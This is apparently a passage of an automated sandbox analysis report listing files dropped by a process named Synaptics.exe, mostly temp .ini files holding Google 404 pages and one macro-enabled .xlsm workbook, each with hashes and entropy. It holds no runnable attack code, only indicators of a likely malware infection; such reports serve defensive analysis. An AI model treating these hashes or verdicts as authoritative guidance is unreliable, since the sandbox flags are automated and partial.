                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2675319095511846
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+05MXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+HX+pAZewRDK4mW
                                                                                                                                                                                        MD5:B262F83BDCC72418EB31F6062BBFEFA2
                                                                                                                                                                                        SHA1:B3B3780E447ABDCBB09B500A194330BC23FF1D9F
                                                                                                                                                                                        SHA-256:4767CF83EC53E70BEF3F6B787DBAC0368B61F2139BEEC8CA8BBE23AB332688F9
                                                                                                                                                                                        SHA-512:096BC850B1C028F217F5CAD5355F013BD1D401A9B742791AEDEA982B9E91F1EFA628A054D4E238955D7E6C650F41B16608CF2BAD514A454532D92025F0560D58
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qa9NTUzO7T4Ky+vkejATzg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\9wmK2oZj.xlsm

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:Microsoft Excel 2007+
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):18387
                                                                                                                                                                                        Entropy (8bit):7.523057953697544
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\AMCSUw6.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.266788075347564
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0JzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+uz+pAZewRDK4mW
                                                                                                                                                                                        MD5:8A523375783687050CC94AEA9987F0B9
                                                                                                                                                                                        SHA1:8E5395336E86F790911B52DBA560A1C84897C65E
                                                                                                                                                                                        SHA-256:0DBDB3DB22A52E3407C8DBBCE6897F1420ACC9D76B406878C989A1214D4A1EE9
                                                                                                                                                                                        SHA-512:7196E8722A833A37FEB860BDB944AAC1768D1B5280955EB2D823E106A25AE44E86542842455CF4AB126ABDD3CB9668AE95D3CC4DFDE74F193D05DCF9DF9C39E4
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Xiu5SXWOP4S53pwGbu7fVA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Aq4sYBN.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.266687464939237
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+063SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+X+pAZewRDK4mW
                                                                                                                                                                                        MD5:518CA5B0D8F5577E70CD9CAA49993CC2
                                                                                                                                                                                        SHA1:9C3CB6DD584E1F866C6F2E2BA68B5C8F55B5E7C5
                                                                                                                                                                                        SHA-256:17940F3C4E8973F334A4ACC91443DFE9BA93F7D0AC5BA4B87DD31CB4FEC5F4E9
                                                                                                                                                                                        SHA-512:C411C98DE42DCAD7E00D90971548D60437934B5B841F74698E20CB245C6FF24F4394EB406BAB1A0E8400D1F51772CC25BCE6EEE7A6CCF626C9EE4546740B7282
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bYJ7Y8VDoqy8dnADbVUQ1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\B8wX3tA.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.270848548511941
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0BwXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK++wX+pAZewRDK4mW
                                                                                                                                                                                        MD5:E981AD01273362ECBC695C07B9578B50
                                                                                                                                                                                        SHA1:51E76BA1D4F120126A8BF474759B02A97E1C194B
                                                                                                                                                                                        SHA-256:F0710A628FDC8CB5C070EBBBE436AED00DF5B086FF0C10F49785EC4296B1E2A9
                                                                                                                                                                                        SHA-512:4F6DD7DCCA81D473EDC5E3CD2AB56B93ABE24D2E12EA514428705544A9207ACBF83846E91BBC3E6BE3E0CC2C38E7F593AEC2B7FF1B8F24C219F164C217F5E794
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6TvWPbCYcXcapGnUnfMD+A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\BEC4hrh.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.25299825235859
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0NSSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+8S+pAZewRDK4mW
                                                                                                                                                                                        MD5:E6D3D803CBF64238874F7D82BB3DE702
                                                                                                                                                                                        SHA1:0314043875C711A60E022ACE4F8322729F2318FD
                                                                                                                                                                                        SHA-256:E8E7817A9FC6FAF9E717BF34964FA69A6D228E792C6A753437800ED1268030E2
                                                                                                                                                                                        SHA-512:6767A8105C630BB810706A7C14F993843731D569A617799EC0BA8679014DA026EB6E6D47002E58A25E7B0E225AC556EBA66F30C3768419AB890631C20CC3CC64
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bUvKiinVDv2aOdkXj/u/8g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\BWFh6CS.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.273600596267446
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0uDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+9+pAZewRDK4mW
                                                                                                                                                                                        MD5:F8FF1A758804312D5696719443B2A856
                                                                                                                                                                                        SHA1:26BECEA7B5191A9B3FDBDDC4E38211C550C60C2F
                                                                                                                                                                                        SHA-256:78558F1392D620120FEC98F50DED292CE6FF9D7DB83B329634CC3FB5E457B289
                                                                                                                                                                                        SHA-512:17C3D9DF5F1357BAD8A7E57ED92C1B106ECDA292B47E9CFF917D5CB95A6ADB535A408BDCB12DD597DFEC0179D2A189FFBEF19C3FD4407B264F588CDC5912335A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/XM3++kuLBGBXTj9ud6q9w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Bt41o1Q.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.275025975823525
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+9+pAZewRDK4mW
                                                                                                                                                                                        MD5:1AC398DE8F7D867A8B8169DEB0B1929D
                                                                                                                                                                                        SHA1:5502E2F7E577CAB6913536BBB03B9B2917CC8423
                                                                                                                                                                                        SHA-256:395F9487CC49E45EC58C175BB257DF6DE18A98421AD7F71812A3C52811346140
                                                                                                                                                                                        SHA-512:7DD93D43260CCE49FE4BDBD0720A2D8801163B8F708A401164AD70190A1D2601EB093CCEC0CA238E03E88A9738BAC8D38D2C1422D430917DEF8EAD9C7ED9B35F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MOyQ75Z0D+yj3LtoBNW8Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Bxk7ldb.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.266298272055168
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0TLSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+A+pAZewRDK4mW
                                                                                                                                                                                        MD5:2E88302D1C98D8E879A37C8D2FEAB4D7
                                                                                                                                                                                        SHA1:5A6ED4A3A6BD35E9686F9835020BF444A3A5675B
                                                                                                                                                                                        SHA-256:C57DCC2829A18440EBE5D68F93671EB3B03C9A6CEB1632B8A83A7D3B681C3028
                                                                                                                                                                                        SHA-512:BCB838A3B11C0F8E22B826D09C2B3ED0F8B45CCFAC1ADCF3C896D8D0E632DC080DCA04C7CCAE664BE47171DC70F31FE82BBA7F592239F269202C4F827E351F5F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CFWc3wIOtVQVUdifGCv1Vg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Ce2LQNN.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.261642194326045
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+9+pAZewRDK4mW
                                                                                                                                                                                        MD5:B1A3412FFBC32B47DFB773BA706A4CCA
                                                                                                                                                                                        SHA1:1D8539216DBE026D60B610873F9F4A558ED47F14
                                                                                                                                                                                        SHA-256:4C2073CF11ED5F1C6767EBBB9E6FB14132FAB186EB814679E690121AA6FE7DD4
                                                                                                                                                                                        SHA-512:2E49831FA7E7846B65E82CD2406B5F9F9E20EA6BFD8076DEB58FDF83E6106B0ADBA1F4711D1C16B58BBF8F574669631D2AF891C22910C68BAFC327BB91EFF693
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5k9hKaW/By3rPU4aiDAhGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\CtIXRV9.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.272023311458
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0USU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+/+pAZewRDK4mW
                                                                                                                                                                                        MD5:A36DF4C8C95D0486E70BA166A1E0FE24
                                                                                                                                                                                        SHA1:EEA47781B5253A1E123B6CB94A04B64B093F6B87
                                                                                                                                                                                        SHA-256:2FF7955B205903339690D68920769A7AC589C6F38F44A2E04C2FA1C25FF43919
                                                                                                                                                                                        SHA-512:57349497A5EB8A7971FD89F12AF2234B8BA94FD1065C45D7E0250C82B536CB65289FCE40401ADE3ED0864E4C59B224FE2034C3EAC5DF12E752AE3A82AF30F7BF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XJBWRk4p4NFNubuThzJVBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\CtdbCkF.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.265197203986973
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0E5zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+r5+pAZewRDK4mW
                                                                                                                                                                                        MD5:5795D1806B3723463A47FF0A3B690431
                                                                                                                                                                                        SHA1:E78118845C562CC67D777653DDBEC99F3B86E360
                                                                                                                                                                                        SHA-256:55991F63AD62E9E69B3485DB0C56B033C9DECE32BB59D94582F3CB749547EE6B
                                                                                                                                                                                        SHA-512:99BD4672B68068F964F424178A638215D8E5428AEDCC046117A1B5EC8C3BFBAAAE0B5E9BCCF04C0269B18D58E7E26F3093C5299200DE87777FD4AB1AC343C61C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sUTTxHOpXNM4ZTt0NjmbKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\DgDuBZt.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.256917201977846
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0uSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+x+pAZewRDK4mW
                                                                                                                                                                                        MD5:CD13F7E49E62D6B0610E1B9829ABE580
                                                                                                                                                                                        SHA1:E8DE43ADA80C6B9257E14161C1D8DF7FB6D4A5FD
                                                                                                                                                                                        SHA-256:0B8499C15E1417B489D3899AE809059BF836DFFE7F3D648E27B157B12D7DC707
                                                                                                                                                                                        SHA-512:F54D04F53E05EDF2C9D6F850ECF65AAE352A64371239C727F76DC29CF7B7CB2C18386429729C4CAF58D56B4EDCB67C2B1414B17CDFEF05920C6BF5ECE06C8B80
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wLNTl5F4UllkLL8LQdLErA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\DnNzLWe.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.258748691572783
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0BSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+++pAZewRDK4mW
                                                                                                                                                                                        MD5:9C4D7647D79E2334F4F8AB3093A0C3B3
                                                                                                                                                                                        SHA1:C9F41B34446061AE241C046E4848CCE3542FA65A
                                                                                                                                                                                        SHA-256:0C69D12EDC897079F20C42C92C2F3EB33B6CAF14180F60A5F2A655DB105F7619
                                                                                                                                                                                        SHA-512:32C66EB88C3ED5B4F87BAAC47A427CD38D4AC6248CE4CC9D435306405EDD2AFC2860FE4E50F01845D7E86D023C6668570ABA6C8D4E432BF53A5ED13A8E2A4AE3
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jJiSgpdhEyIvb/mG2t+PkA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\E3NVuAg.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263546028330045
                                                                                                                                                                                        Encrypted:false
